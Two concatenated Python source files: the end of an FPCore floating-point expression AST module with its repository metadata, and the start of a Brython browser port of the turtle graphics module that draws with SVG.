return type(self)(self.props, body)
def remove_annotations(self):
return self.body.remove_annotations()
def condense_annotations(self, global_props=None, local_props=None):
new_props = update_props(local_props, self.props)
return self.body.condense_annotations(global_props, new_props)
def canonicalize_annotations(self, global_props=None):
all_props = update_props(global_props, self.props)
return self.body.canonicalize_annotations(all_props)
def merge_annotations(self, annotations, local_props=None):
new_props = update_props(local_props, self.props)
return self.body.merge_annotations(annotations, new_props)
# control flow and tensors
class ControlExpr(Expr):
name: str = 'ControlExpr'
class If(ControlExpr):
name: str = 'if'
def __init__(self, cond: Expr, then_body: Expr, else_body: Expr) -> None:
self.cond: Expr = cond
self.then_body: Expr = then_body
self.else_body: Expr = else_body
def __str__(self):
return '(' + self.name + ' ' + str(self.cond) + ' ' + str(self.then_body) + ' ' + str(self.else_body) + ')'
def __repr__(self):
return type(self).__name__ + '(' + repr(self.cond) + ', ' + repr(self.then_body) + ', ' + repr(self.else_body) + ')'
def subexprs(self):
return [[self.cond, self.then_body, self.else_body]]
def replace_subexprs(self, exprs):
((cond, then_body, else_body,),) = exprs
return type(self)(cond, then_body, else_body)
class Let(ControlExpr):
name: str = 'let'
def __init__(self, let_bindings: typing.List[typing.Tuple[str, Expr]], body: Expr) -> None:
self.let_bindings: typing.List[typing.Tuple[str, Expr]] = let_bindings
self.body: Expr = body
def __str__(self):
return ('(' + self.name
+ ' (' + ' '.join(('[' + x + ' ' + str(e) + ']' for x, e in self.let_bindings)) + ') '
+ str(self.body) + ')')
def __repr__(self):
return type(self).__name__ + '(' + repr(self.let_bindings) + ', ' + repr(self.body) + ')'
def subexprs(self):
let_vars, let_exprs = zip(*self.let_bindings)
return [let_exprs, [self.body]]
def replace_subexprs(self, exprs):
(let_exprs, (body,),) = exprs
let_bindings = [(x, e,) for ((x, _,), e,) in zip(self.let_bindings, let_exprs)]
return type(self)(let_bindings, body)
class LetStar(Let):
name: str = 'let*'
class While(ControlExpr):
name: str = 'while'
def __init__(self, cond: Expr, while_bindings: typing.List[typing.Tuple[str, Expr, Expr]], body: Expr) -> None:
self.cond: Expr = cond
self.while_bindings: typing.List[typing.Tuple[str, Expr, Expr]] = while_bindings
self.body: Expr = body
def __str__(self):
return ('(' + self.name + ' ' + str(self.cond)
+ ' (' + ' '.join(('[' + x + ' ' + str(e0) + ' ' + str(e) + ']' for x, e0, e in self.while_bindings)) + ') '
+ str(self.body) + ')')
def __repr__(self):
return type(self).__name__ + '(' + repr(self.cond) + ', ' + repr(self.while_bindings) + ', ' + repr(self.body) + ')'
def subexprs(self):
while_vars, while_inits, while_updates = zip(*self.while_bindings)
return [[self.cond], while_inits, while_updates, [self.body]]
def replace_subexprs(self, exprs):
((cond,), while_inits, while_updates, (body,),) = exprs
while_bindings = [(x, e0, e,) for ((x, _, _,), e0, e,) in zip(self.while_bindings, while_inits, while_updates)]
return type(self)(cond, while_bindings, body)
class WhileStar(While):
name: str = 'while*'
class For(ControlExpr):
name: str = 'for'
def __init__(self,
dim_bindings: typing.List[typing.Tuple[str, Expr]],
while_bindings: typing.List[typing.Tuple[str, Expr, Expr]],
body: Expr) -> None:
self.dim_bindings: typing.List[typing.Tuple[str, Expr]] = dim_bindings
self.while_bindings: typing.List[typing.Tuple[str, Expr, Expr]] = while_bindings
self.body: Expr = body
def __str__(self):
return ('(' + self.name
+ ' (' + ' '.join(('[' + x + ' ' + str(e) + ']' for x, e in self.dim_bindings)) + ')'
+ ' (' + ' '.join(('[' + x + ' ' + str(e0) + ' ' + str(e) + ']' for x, e0, e in self.while_bindings)) + ') '
+ str(self.body) + ')')
def __repr__(self):
return type(self).__name__ + '(' + repr(self.dim_bindings) + ', ' + repr(self.while_bindings) + ', ' + repr(self.body) + ')'
def subexprs(self):
dim_vars, dim_exprs = zip(*self.dim_bindings)
while_vars, while_inits, while_updates = zip(*self.while_bindings)
return [dim_exprs, while_inits, while_updates, [self.body]]
def replace_subexprs(self, exprs):
(dim_exprs, while_inits, while_updates, (body,),) = exprs
dim_bindings = [(x, e,) for ((x, _,), e,) in zip(self.dim_bindings, dim_exprs)]
while_bindings = [(x, e0, e,) for ((x, _, _,), e0, e,) in zip(self.while_bindings, while_inits, while_updates)]
return type(self)(dim_bindings, while_bindings, body)
def expand_tensor(self, ctx):
idx_var, idx_max = self.dim_bindings[0]
let_var, let_init, let_update = self.while_bindings[0]
star_bindings = [(let_var, let_init.expand_tensor(ctx))]
for i in range(idx_max.i):
new_ctx = {}
new_ctx.update(ctx)
new_ctx.update({idx_var : i})
star_bindings.append((let_var, let_update.expand_tensor(new_ctx)))
return LetStar(star_bindings, self.body.expand_tensor(ctx))
class ForStar(For):
name: str = 'for*'
class Tensor(ControlExpr):
name: str = 'tensor'
def __init__(self, dim_bindings: typing.List[typing.Tuple[str, Expr]], body: Expr) -> None:
self.dim_bindings: typing.List[typing.Tuple[str, Expr]] = dim_bindings
self.body: Expr = body
def __str__(self):
return ('(' + self.name
+ ' (' + ' '.join(('[' + x + ' ' + str(e) + ']' for x, e in self.dim_bindings)) + ') '
+ str(self.body) + ')')
def __repr__(self):
return type(self).__name__ + '(' + repr(self.dim_bindings) + ', ' + repr(self.body) + ')'
def subexprs(self):
dim_vars, dim_exprs = zip(*self.dim_bindings)
return [dim_exprs, [self.body]]
def replace_subexprs(self, exprs):
(dim_exprs, (body,),) = exprs
dim_bindings = [(x, e,) for ((x, _,), e,) in zip(self.dim_bindings, dim_exprs)]
return type(self)(dim_bindings, body)
class TensorStar(Tensor):
name: str = 'tensor*'
def __init__(self,
ident: str,
dim_bindings: typing.List[typing.Tuple[str, Expr]],
while_bindings: typing.List[typing.Tuple[str, Expr, Expr]],
body: Expr) -> None:
self.ident: str = ident
self.dim_bindings: typing.List[typing.Tuple[str, Expr]] = dim_bindings
self.while_bindings: typing.List[typing.Tuple[str, Expr, Expr]] = while_bindings
self.body: Expr = body
def __str__(self):
if self.ident:
ident_str = ' ' + self.ident
else:
ident_str = ''
if self.while_bindings:
while_str = ' (' + ' '.join(('[' + x + ' ' + str(e0) + ' ' + str(e) + ']' for x, e0, e in self.while_bindings)) + ')'
else:
while_str = ''
return ('(' + self.name
+ ident_str
+ ' (' + ' '.join(('[' + x + ' ' + str(e) + ']' for x, e in self.dim_bindings)) + ')'
+ while_str
+ ' ' + str(self.body) + ')')
def __repr__(self):
return (type(self).__name__ + '('
+ repr(self.ident) + ', '
+ repr(self.dim_bindings) + ', '
+ repr(self.while_bindings) + ', '
+ repr(self.body) + ')')
def subexprs(self):
dim_vars, dim_exprs = zip(*self.dim_bindings)
if self.while_bindings:
while_vars, while_inits, while_updates = zip(*self.while_bindings)
else:
while_vars, while_inits, while_updates = [], [], []
return [dim_exprs, while_inits, while_updates, [self.body]]
def replace_subexprs(self, exprs):
(dim_exprs, while_inits, while_updates, (body,),) = exprs
dim_bindings = [(x, e,) for ((x, _,), e,) in zip(self.dim_bindings, dim_exprs)]
while_bindings = [(x, e0, e,) for ((x, _, _,), e0, e,) in zip(self.while_bindings, while_inits, while_updates)]
return type(self)(self.ident, dim_bindings, while_bindings, body)
# operations
class NaryExpr(Expr):
name: str = 'NaryExpr'
def __init__(self, *children: Expr) -> None:
self.children: typing.List[Expr] = children
def __str__(self):
return '(' + self.name + ''.join((' ' + str(child) for child in self.children)) + ')'
def __repr__(self):
return type(self).__name__ + '(' + ', '.join((repr(child) for child in self.children)) + ')'
def subexprs(self):
return [self.children]
def replace_subexprs(self, exprs):
(children,) = exprs
return type(self)(*children)
def canonicalize_annotations(self, global_props=None):
result = super().canonicalize_annotations(global_props)
if global_props:
return Ctx(global_props, result)
else:
return result
class Array(NaryExpr):
name: str = 'array'
# this is a dumb copy-pasta to avoid inheriting the behavior of other NaryExprs
# really there should be a MathOp mixin or something
def canonicalize_annotations(self, global_props=None):
exprs = [[e.canonicalize_annotations(global_props) for e in es] for es in self.subexprs()]
return self.replace_subexprs(exprs)
class UnknownOperator(NaryExpr):
name: str = 'UnknownOperator'
def __init__(self, *children: Expr, name='UnknownOperator') -> None:
super().__init__(*children)
self.name = name
def __repr__(self):
return type(self).__name__ + '(' + ''.join((repr(child) + ', ' for child in self.children)) + 'name=' + repr(self.name) + ')'
def replace_subexprs(self, exprs):
(children,) = exprs
return type(self)(*children, name=self.name)
class UnaryExpr(NaryExpr):
name: str = 'UnaryExpr'
def __init__(self, child0: Expr) -> None:
super().__init__(child0)
class BinaryExpr(NaryExpr):
name: str = 'BinaryExpr'
def __init__(self, child0: Expr, child1: Expr) -> None:
super().__init__(child0, child1)
class TernaryExpr(NaryExpr):
name: str = 'TernaryExpr'
def __init__(self, child0: Expr, child1: Expr, child2: Expr) -> None:
super().__init__(child0, child1, child2)
# cast is the identity function, used for repeated rounding
class Cast(UnaryExpr):
name: str = 'cast'
# tensor operations
class Dim(UnaryExpr):
name: str = 'dim'
class Size(NaryExpr):
name: str = 'size'
class Ref(NaryExpr):
name: str = 'ref'
def expand_tensor(self, ctx):
tensor_expr = self.children[0]
index_exprs = self.children[1:]
if isinstance(tensor_expr, Var):
index_values = []
for e in index_exprs:
if isinstance(e, Var):
index_values.append(ctx[e.value])
elif isinstance(e, Integer):
index_values.append(e.i)
else:
raise NotImplementedError()
return tensor_expr.value + '_' + '_'.join(map(str, index_values))
else:
raise NotImplementedError()
# IEEE 754 required arithmetic
class Add(BinaryExpr):
name: str = '+'
class Sub(BinaryExpr):
name: str = '-'
class Mul(BinaryExpr):
name: str = '*'
class Div(BinaryExpr):
name: str = '/'
class Sqrt(UnaryExpr):
name: str = 'sqrt'
class Fma(TernaryExpr):
name: str = 'fma'
# discrete operations
class Neg(UnaryExpr):
# note that unary negation has the same "name" as subtraction
name: str = '-'
class Copysign(BinaryExpr):
name: str = 'copysign'
class Fabs(UnaryExpr):
name: str = 'fabs'
# composite arithmetic
class Fdim(BinaryExpr):
name: str = 'fdim'
class Fmax(BinaryExpr):
name: str = 'fmax'
class Fmin(BinaryExpr):
name: str = 'fmin'
class Fmod(BinaryExpr):
name: str = 'fmod'
class Remainder(BinaryExpr):
name: str = 'remainder'
# rounding and truncation
class Ceil(UnaryExpr):
name: str = 'ceil'
class Floor(UnaryExpr):
name: str = 'floor'
class Nearbyint(UnaryExpr):
name: str = 'nearbyint'
class Round(UnaryExpr):
name: str = 'round'
class Trunc(UnaryExpr):
name: str = 'trunc'
# trig
class Acos(UnaryExpr):
name: str = 'acos'
class Acosh(UnaryExpr):
name: str = 'acosh'
class Asin(UnaryExpr):
name: str = 'asin'
class Asinh(UnaryExpr):
name: str = 'asinh'
class Atan(UnaryExpr):
name: str = 'atan'
class Atan2(BinaryExpr):
name: str = 'atan2'
class Atanh(UnaryExpr):
name: str = 'atanh'
class Cos(UnaryExpr):
name: str = 'cos'
class Cosh(UnaryExpr):
name: str = 'cosh'
class Sin(UnaryExpr):
name: str = 'sin'
class Sinh(UnaryExpr):
name: str = 'sinh'
class Tan(UnaryExpr):
name: str = 'tan'
class Tanh(UnaryExpr):
name: str = 'tanh'
# exponentials
class Exp(UnaryExpr):
name: str = 'exp'
class Exp2(UnaryExpr):
name: str = 'exp2'
class Expm1(UnaryExpr):
name: str = 'expm1'
class Log(UnaryExpr):
name: str = 'log'
class Log10(UnaryExpr):
name: str = 'log10'
class Log1p(UnaryExpr):
name: str = 'log1p'
class Log2(UnaryExpr):
name: str = 'log2'
# powers
class Cbrt(UnaryExpr):
name: str = 'cbrt'
class Hypot(BinaryExpr):
name: str = 'hypot'
class Pow(BinaryExpr):
name: str = 'pow'
# other
class Erf(UnaryExpr):
name: str = 'erf'
class Erfc(UnaryExpr):
name: str = 'erfc'
class Lgamma(UnaryExpr):
name: str = 'lgamma'
class Tgamma(UnaryExpr):
name: str = 'tgamma'
# comparison
class LT(NaryExpr):
name: str = '<'
class GT(NaryExpr):
name: str = '>'
class LEQ(NaryExpr):
name: str = '<='
class GEQ(NaryExpr):
name: str = '>='
class EQ(NaryExpr):
name: str = '=='
class NEQ(NaryExpr):
name: str = '!='
# classification
class Isfinite(UnaryExpr):
name: str = 'isfinite'
class Isinf(UnaryExpr):
name: str = 'isinf'
class Isnan(UnaryExpr):
name: str = 'isnan'
class Isnormal(UnaryExpr):
name: str = 'isnormal'
class Signbit(UnaryExpr):
name: str = 'signbit'
# logic
class And(NaryExpr):
name: str = 'and'
class Or(NaryExpr):
name: str = 'or'
class Not(UnaryExpr):
name: str = 'not'
# fpcore objects and helpers
class FPCore(object):
def __init__(self, inputs, e, props=None, ident=None, name=None, pre=None, spec=None):
self.inputs = inputs
self.e = e
if props is None:
self.props = {}
else:
self.props = props
self.ident = ident
self.name = name
self.pre = pre
self.spec = spec
def __str__(self):
return 'FPCore ({})\n ident: {}\n name: {}\n pre: {}\n spec: {}\n {}'.format(
' '.join((annotation_to_string(*arg) for arg in self.inputs)),
str(self.ident), str(self.name), str(self.pre), str(self.spec), str(self.e))
def __repr__(self):
return 'FPCore(\n {},\n {},\n ident={}\n props={}\n)'.format(
repr(self.inputs), repr(self.e), repr(self.ident), repr(self.props))
def __eq__(self, other):
if not isinstance(other, FPCore):
return False
return self.inputs == other.inputs and self.e == other.e and self.props == other.props
@property
def sexp(self):
return '(FPCore ({}) {}{})'.format(
' '.join((annotation_to_string(*arg) for arg in self.inputs)),
''.join(':' + name + ' ' + sexp_to_string(prop) + ' ' for name, prop in self.props.items()),
str(self.e))
def expand_tensor(self):
new_args = []
for arg in self.inputs:
name, props, shape = arg
if shape:
size = shape[0]
new_names = [name + '_' + str(i) for i in range(size)]
for new_name in new_names:
new_args.append((new_name, props, []))
else:
new_args.append(arg)
return FPCore(new_args, self.e.expand_tensor({}),
props=self.props,
ident=self.ident,
name=self.name,
pre=self.pre.expand_tensor({}) if self.pre else None,
spec=self.spec.expand_tensor({}) if self.spec else None)
| {
"repo_name": "billzorn/fpunreal",
"path": "titanfp/fpbench/fpcast.py",
"copies": "1",
"size": "26421",
"license": "mit",
"hash": -5900697640643337000,
"line_mean": 27.6561822126,
"line_max": 133,
"alpha_frac": 0.5588357746,
"autogenerated": false,
"ratio": 3.4272927746789468,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.44861285492789466,
"avg_score": null,
"num_lines": null
} |
# A revised version of CPython's turtle module written for Brython
#
# Note: This version is not intended to be used in interactive mode,
# nor use help() to look up methods/functions definitions. The docstrings
# have thus been shortened considerably as compared with the CPython's version.
#
# All public methods/functions of the CPython version should exist, if only
# to print out a warning that they are not implemented. The intent is to make
# it easier to "port" any existing turtle program from CPython to the browser.
#
# IMPORTANT: We use SVG for drawing turtles. If we have a turtle at an angle
# of 350 degrees and we rotate it by an additional 20 degrees, we will have
# a turtle at an angle of 370 degrees. For turtles drawn periodically on
# a screen (like typical animations, including the CPython turtle module),
# drawing a turtle with a rotation of 370 degrees is the same as a rotation of
# 10 degrees. However, using SVG, if we "slowly" animate an object,
# rotating it from 350 to 370 degrees, the result will not be the same
# as rotating it from 350 to 10 degrees. For this reason, we did not use the
# Vec2D class from the CPython module and handle the rotations quite differently.
import math
import sys
from math import cos, sin
from browser import console, document, html, timer
import _svg as svg
import copy
# Even though it is a private object, use the same name for the configuration
# dict as the CPython's module.
# Commented out configuration items are those found on the CPython version
_CFG = {
# "width" : 0.5, # Screen
# "height" : 0.75,
"canvwidth" : 500,
"canvheight": 500,
# "leftright": None,
# "topbottom": None,
"mode": "standard",
# "colormode": 1.0,
# "delay": 10,
# "undobuffersize": 1000,
"shape": "classic",
"pencolor" : "black",
"fillcolor" : "black",
# "resizemode" : "noresize",
"visible" : True,
# "language": "english", # docstrings
# "exampleturtle": "turtle",
# "examplescreen": "screen",
# "title": "Python Turtle Graphics",
# "using_IDLE": False
# Below are configuration items specific to this version
"turtle_canvas_wrapper": None,
"turtle_canvas_id": "turtle-canvas",
"min_duration": "1ms"
}
_cfg_copy = copy.copy(_CFG)
def set_defaults(**params):
"""Allows to override defaults."""
_CFG.update(**params)
Screen().reset()
class FormattedTuple(tuple):
'''used to give a nicer representation of the position'''
def __new__(cls, x, y):
return tuple.__new__(cls, (x, y))
def __repr__(self):
return "(%.2f, %.2f)" % self
def create_circle(r):
'''Creates a circle of radius r centered at the origin'''
circle = svg.circle(x=0, y=0, r=r, stroke="black", fill="black")
circle.setAttribute("stroke-width", 1)
return circle
def create_polygon(points):
'''Creates a polygon using the points provided'''
points = ["%s,%s " % (x, y) for x, y in points]
polygon = svg.polygon(points=points, stroke="black", fill="black")
polygon.setAttribute("stroke-width", 1)
return polygon
def create_rectangle(width=2, height=2, rx=None, ry=None):
'''Creates a rectangle centered at the origin. rx and ry can be
used to have rounded corners'''
rectangle = svg.rect(x=-width/2, y=-height/2, width=width,
height=height, stroke="black", fill="black")
rectangle.setAttribute("stroke-width", 1)
if rx is not None:
rectangle.setAttribute("rx", rx)
if ry is not None:
rectangle.setAttribute("ry", ry)
return rectangle
def create_square(size=2, r=None):
'''Creates a square centered at the origin. rx and ry can be
used to have rounded corners'''
return create_rectangle(width=size, height=size, rx=r, ry=r)
class TurtleGraphicsError(Exception):
"""Some TurtleGraphics Error
"""
pass
class Singleton(type):
_instances = {}
def __call__(cls, *args, **kwargs):
if cls not in cls._instances:
cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)
return cls._instances[cls]
class Screen(metaclass=Singleton):
def __init__(self):
self.shapes = {
'arrow': (create_polygon, ((-10, 0), (10, 0), (0, 10))),
'turtle': (create_polygon, ((0, 16), (-2, 14), (-1, 10), (-4, 7),
(-7, 9), (-9, 8), (-6, 5), (-7, 1), (-5, -3), (-8, -6),
(-6, -8), (-4, -5), (0, -7), (4, -5), (6, -8), (8, -6),
(5, -3), (7, 1), (6, 5), (9, 8), (7, 9), (4, 7), (1, 10),
(2, 14))),
'classic': (create_polygon, ((0, 0), (-5, -9), (0, -7), (5, -9))),
'triangle': (create_polygon, ((10, -5.77), (0, 11.55), (-10, -5.77))),
'square': (create_square, 20),
'circle': (create_circle, 10)
}
self.reset()
self._set_geometry()
def bgcolor(self, color=None):
"""sets the background with the given color if color is not None,
else return current background color.
"""
if color is None:
return self.background_color
self.background_color = color
width = _CFG['canvwidth']
height = _CFG['canvheight']
if self.mode() in ['logo', 'standard']:
x = -width//2
y = -height//2
else:
x = 0
y = -height
self.frame_index += 1
rect = svg.rect(x=x, y=y, width=width, height=height, fill=color,
style={'display': 'none'})
an = svg.animate(Id="animation_frame%s" % self.frame_index,
attributeName="display", attributeType="CSS",
From="block", to="block", dur=_CFG["min_duration"],
fill='freeze')
an.setAttribute('begin', "animation_frame%s.end" % (self.frame_index-1))
rect <= an
self.background_canvas <=rect
def _convert_coordinates(self, x, y):
"""In the browser, the increasing y-coordinate is towards the
bottom of the screen; this is the opposite of what is assumed
normally for the methods in the CPython turtle module.
This method makes the necessary orientation. It should be called
just prior to creating any SVG element.
"""
return x*self.yscale, self.y_points_down * y*self.yscale
def create_svg_turtle(self, _turtle, name):
if name in self.shapes:
fn = self.shapes[name][0]
arg = self.shapes[name][1]
else:
print("Unknown turtle '%s'; the default turtle will be used")
fn = self.shapes[_CVG["shape"]][0]
arg = self.shapes[_CVG["shape"]][1]
shape = fn(arg)
if self._mode == 'standard' or self._mode == 'world':
rotation = -90
else:
rotation = 0
return shape, rotation
def _dot(self, pos, size, color):
"""Draws a filled circle of specified size and color"""
if color is None:
color = 'black'
if size is None or size < 1:
size = 1
self.frame_index += 1
x, y = self._convert_coordinates(pos[0], pos[1])
circle = svg.circle(cx=x, cy=y, r=size, fill=color,
style={'display': 'none'})
an = svg.animate(Id="animation_frame%s" % self.frame_index,
attributeName="display", attributeType="CSS",
From="block", to="block", dur=_CFG["min_duration"],
fill='freeze')
an.setAttribute('begin', "animation_frame%s.end" % (self.frame_index-1))
circle <= an
self.canvas <= circle
def _drawline(self, _turtle, coordlist=None,
color=None, width=1, speed=None):
"""Draws an animated line with a turtle
- coordlist is the egin and end coordinates of the line
- color should include the current outline and fill colors;
- width is width of line to be drawn.
- speed is the animation speed
"""
outline = color[0]
fill = color[1]
x0, y0 = coordlist[0]
x1, y1 = coordlist[1]
x0, y0 = self._convert_coordinates(x0, y0)
x1, y1 = self._convert_coordinates(x1, y1)
# The speed scale does not correspond exactly to the CPython one...
if speed == 0:
duration = _CFG["min_duration"]
else:
dist = _turtle._distance
if speed is None or speed == 1:
duration = 0.02 * dist
else:
duration = 0.02 * dist / speed ** 1.2
if duration < 0.001:
duration = _CFG["min_duration"]
else:
duration = "%6.3fs" % duration
drawing = _turtle._drawing
_line = svg.line(x1=x0, y1=y0, x2=x0, y2=y0,
style={'stroke': outline, 'stroke-width': width})
if not drawing:
_line.setAttribute('opacity', 0)
# always create one animation for timing purpose
begin = "animation_frame%s.end" % self.frame_index
self.frame_index += 1
_an1 = svg.animate(Id="animation_frame%s" % self.frame_index,
attributeName="x2", attributeType="XML",
From=x0, to=x1, dur=duration, fill='freeze',
begin=begin)
_line <= _an1
## But, do not bother adding animations that will not be shown.
if drawing:
_an2 = svg.animate(attributeName="y2", attributeType="XML",
begin=begin,
From=y0, to=y1, dur=duration, fill='freeze')
_line <= _an2
if width > 2:
_line_cap = svg.set(attributeName="stroke-linecap",
begin=begin,
attributeType="xml", to="round", dur=duration, fill='freeze')
_line <= _line_cap
self.canvas <= _line
return begin, duration, (x0, y0), (x1, y1)
def _drawpoly(self, coordlist, outline=None, fill=None, width=None):
"""Draws a path according to provided arguments:
- coordlist is sequence of coordinates
- fill is filling color
- outline is outline color
- width is the outline width
"""
self.frame_index += 1
shape = ["%s,%s" % self._convert_coordinates(x, y) for x, y in coordlist]
style = {'display': 'none'}
if fill is not None:
style['fill'] = fill
if outline is not None:
style['stroke'] = outline
if width is not None:
style['stroke-width'] = width
else:
style['stroke-width'] = 1
polygon = svg.polygon(points=" ".join(shape), style=style)
an = svg.animate(Id="animation_frame%s" % self.frame_index,
attributeName="display", attributeType="CSS",
From="block", to="block", dur=_CFG["min_duration"],
fill='freeze')
an.setAttribute('begin', "animation_frame%s.end" % (self.frame_index-1))
polygon <= an
self.canvas <= polygon
def _new_frame(self):
'''returns a new animation frame index and update the current indes'''
previous_end = "animation_frame%s.end" % self.frame_index
self.frame_index += 1
new_frame_id = "animation_frame%s" % self.frame_index
return previous_end, new_frame_id
def mode(self, _mode=None):
if _mode is None:
return self._mode
_CFG['mode'] = _mode
self.reset()
def reset(self):
self._turtles = []
self.frame_index = 0
self.background_color = "white"
self._set_geometry()
def _set_geometry(self):
self.width = _CFG["canvwidth"]
self.height = _CFG["canvheight"]
self.x_offset = self.y_offset = 0
self.xscale = self.yscale = 1
self.y_points_down = -1
self._mode = _CFG["mode"].lower()
if self._mode in ['logo', 'standard']:
self.translate_canvas = (self.width//2, self.height//2)
elif self._mode == 'world':
self.translate_canvas = (0, self.height)
self._setup_canvas()
def _setup_canvas(self):
self.svg_scene = svg.svg(Id=_CFG["turtle_canvas_id"], width=self.width,
height=self.height)
translate = "translate(%d %d)" % self.translate_canvas
# always create one animation for timing purpose
self.svg_scene <= svg.animate(
Id="animation_frame%s" % self.frame_index,
attributeName="width", attributeType="CSS",
From=self.width, to=self.width, begin="0s",
dur=_CFG["min_duration"], fill='freeze')
# Unlike html elements, svg elements have no concept of a z-index: each
# new element is drawn on top of each other.
# Having separate canvas keeps the ordering
self.background_canvas = svg.g(transform=translate)
self.canvas = svg.g(transform=translate)
self.writing_canvas = svg.g(transform=translate)
self.turtle_canvas = svg.g(transform=translate)
self.svg_scene <= self.background_canvas
self.svg_scene <= self.canvas
self.svg_scene <= self.writing_canvas
self.svg_scene <= self.turtle_canvas
def setworldcoordinates(self, llx, lly, urx, ury):
"""Set up a user defined coordinate-system.
Arguments:
llx -- a number, x-coordinate of lower left corner of canvas
lly -- a number, y-coordinate of lower left corner of canvas
urx -- a number, x-coordinate of upper right corner of canvas
ury -- a number, y-coordinate of upper right corner of canvas
Note: llx must be less than urx in this version.
Warning: in user-defined coordinate systems angles may appear distorted.
"""
self._mode = "world"
if urx < llx:
sys.stderr.write("Warning: urx must be greater than llx; your choice will be reversed")
urx, llx = llx, urx
xspan = urx - llx
yspan = abs(ury - lly)
self.xscale = int(self.width) / xspan
self.yscale = int(self.height) / yspan
self.x_offset = -llx * self.xscale
if ury < lly:
self.y_points_down = 1 # standard orientation in the browser
else:
self.y_points_down = -1
self.y_offset = self.y_points_down * lly * self.yscale
self.translate_canvas = (self.x_offset, self.height-self.y_offset)
self._setup_canvas()
def show_scene(self):
'''Ends the creation of a "scene" and has it displayed'''
for t in self._turtles:
self.turtle_canvas <= t.svg
if _CFG["turtle_canvas_wrapper"] is None:
_CFG["turtle_canvas_wrapper"] = html.DIV(Id="turtle-canvas-wrapper")
document <= _CFG["turtle_canvas_wrapper"]
if _CFG["turtle_canvas_id"] not in document:
_CFG["turtle_canvas_wrapper"] <= self.svg_scene
def set_svg():
# need to have a delay for chrome so that first few draw commands are viewed properly.
_CFG["turtle_canvas_wrapper"].html = _CFG["turtle_canvas_wrapper"].html
timer.set_timeout(set_svg, 1)
def turtles(self):
"""Return the list of turtles on the screen.
"""
return self._turtles
def _write(self, pos, txt, align, font, color):
"""Write txt at pos in canvas with specified font
and color."""
if isinstance(color, tuple):
stroke = color[0]
fill = color[1]
else:
fill = color
stroke = None
x, y = self._convert_coordinates(pos[0], pos[1])
text = svg.text(txt, x=x, y=y, fill=fill,
style={'display': 'none',
'font-family': font[0],
'font-size': font[1],
'font-style': font[2]})
if stroke is not None:
text.setAttribute('stroke', stroke)
if align == 'left':
text.setAttribute('text-anchor', 'start')
elif align == 'center' or align == 'centre':
text.setAttribute('text-anchor', 'middle')
elif align == 'right':
text.setAttribute('text-anchor', 'end')
self.frame_index += 1
an = svg.animate(Id="animation_frame%s" % self.frame_index,
attributeName="display", attributeType="CSS",
From="block", to="block", dur=_CFG["min_duration"],
fill='freeze')
an.setAttribute('begin', "animation_frame%s.end" % (self.frame_index-1))
text <= an
self.writing_canvas <= text
def addshape(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.addshape() is not implemented.\n")
def bgpic(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.bgpic() is not implemented.\n")
def bye(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.bye() is not implemented.\n")
def clearscreen(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.clearscreen() is not implemented.\n")
def colormode(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.colormode() is not implemented.\n")
def delay(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.delay() is not implemented.\n")
def exitonclick(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.exitonclick() is not implemented.\n")
def getcanvas(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.getcanvas() is not implemented.\n")
def getshapes(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.getshapes() is not implemented.\n")
def addshape(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.addshape() is not implemented.\n")
def listen(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.listen() is not implemented.\n")
def mainloop(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.mainloop() is not implemented.\n")
def numinput(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.numinput() is not implemented.\n")
def onkey(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.onkey() is not implemented.\n")
def onkeypress(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.onkeypress() is not implemented.\n")
def onkeyrelease(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.onkeyrelease() is not implemented.\n")
def onscreenclick(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.onscreenclick() is not implemented.\n")
def ontimer(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.ontimer() is not implemented.\n")
def register_shape(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.register_shape() is not implemented.\n")
def resetscreen(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.resetscreen() is not implemented.\n")
def screensize(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.screensize() is not implemented.\n")
def setup(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.setup() is not implemented.\n")
def textinput(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.textinput() is not implemented.\n")
def title(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.title() is not implemented.\n")
def tracer(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.tracer() is not implemented.\n")
def update(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.update() is not implemented.\n")
def window_height(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.window_height() is not implemented.\n")
def window_width(self, *args, **kwargs):
sys.stderr.write("Warning: Screen.window_width() is not implemented.\n")
class TNavigator:
"""Navigation part of the Turtle.
Implements methods for turtle movement.
"""
# START_ORIENTATION = {
# "standard": Vec2D(1.0, 0.0),
# "world": Vec2D(1.0, 0.0),
# "logo": Vec2D(0.0, 1.0)}
DEFAULT_MODE = "standard"
DEFAULT_ANGLEOFFSET = 0
DEFAULT_ANGLEORIENT = 1
def __init__(self, mode=DEFAULT_MODE):
self._angleOffset = self.DEFAULT_ANGLEOFFSET
self._angleOrient = self.DEFAULT_ANGLEORIENT
self._mode = mode
self.degree_to_radians = math.pi / 180
self.degrees()
self._mode = _CFG['mode']
self._setmode(mode)
TNavigator.reset(self)
def reset(self):
"""reset turtle navigation to its initial values
The derived class, which will call it directly and add its own
"""
self._position = (0.0, 0.0)
self._x = 0
self._y = 0
self._angle = 0
self._old_heading = 0
def _setmode(self, mode=None):
"""Set turtle-mode to 'standard', 'world' or 'logo'.
"""
if mode is None:
return self._mode
if mode not in ["standard", "logo", "world"]:
print(mode, "is an unknown mode; it will be ignored.")
return
self._mode = mode
if mode in ["standard", "world"]:
self._angleOffset = 0
